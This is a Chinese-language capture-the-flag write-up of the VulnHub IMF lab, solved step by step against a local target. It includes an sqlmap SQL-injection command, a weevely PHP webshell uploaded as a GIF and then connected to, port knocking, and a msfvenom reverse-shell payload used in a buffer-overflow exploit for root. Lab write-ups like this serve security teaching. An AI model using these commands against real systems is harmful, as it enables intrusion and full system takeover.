2021年1月9日-Vulnhub-IMF
介绍
下载地址:https://www.vulnhub.com/entry/imf-1,162/
kali地址:192.168.31.77
靶机IP地址:192.168.31.233
步骤
nmap 扫描端口
访问web页面
找了半天 发现了 第一个flag ,使用了base64加密
使用base64解码
这三个文件是连在一起的,放在一起一起解密
获得flag2
继续base64解密
得到imfadministrator
访问目录
contact.php有三个用户名,可以用这三个用户名尝试登录
使用Burpsuite作为代理软件,截取信息
Burpsuite 教程https://www.bilibili.com/video/BV1T7411m7KG/
尝试使用admin /admin登录
显示,无效的用户名
使用rmichaels作为用户名,密码使用空数组可以获得 flag3{Y29udGludWVUT2Ntcw==}
并得到 cms.php?pagename=home
使用base64 对 flag3解密
访问cms.php?pagename=home 页面
将 home替换为 *
保存到文件,然后对其进行sql注入攻击
sqlmap -r biusql --risk=3 --level=5 --dbs --dump --batch --threads=10
访问 /images/whiteboard.jpg
扫描二维码得到 flag4{dXBsb2FKcjk0Mi5waHA=}
对其进行base64解密
访问uploadr942.php, 可以上传文件
使用weevely提权
首先利用weevely生成 php文件
上传文件
将 biu.php 修改成gif文件
修改gif文件
上传图片木马
文件上传成功
返回值 7652164f4a67
利用 weevely链接木马
weevely http://192.168.31.233/imfadministrator/uploads/7652164f4a67.gif jesse
获得 flag5
对其进行 base64解密
解码 agentservices 代理服务
搜索文件
使用>/dev/null把错误信息重定向到黑洞中,只留下正确的信息回显,
查看 7788端口也有代理在执行
在 /usr/local/bin 下发现端口序列:7482 8279 9467
使用knock敲门
首先下载 git clone https://github.com/grongor/knock.git
敲开了7788端口
使用 file_agent 下载文件到本地
使用 file 产看 agent是 ELF32位文件
使用ltrace(跟踪进程调用库函数的情况)查看agent信息
运行 agent 这次输入id值:48093572,ID正确
要通过缓冲区溢出7788端口的agent程序,用二进制修改exp
为该程序创建一个利用程序。
我们为msfvenom有效负载创建一个shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.77 LPORT=6666 -f python -b "\x00\x0a\x0b"
监听6666 端口,获得靶机root权限
进入 /root 路径下,获得flag6
总结
这个靶机使用的知识点 比较多,断断续续搞了两天才写完。
有些地方还没搞懂还需要慢慢消化。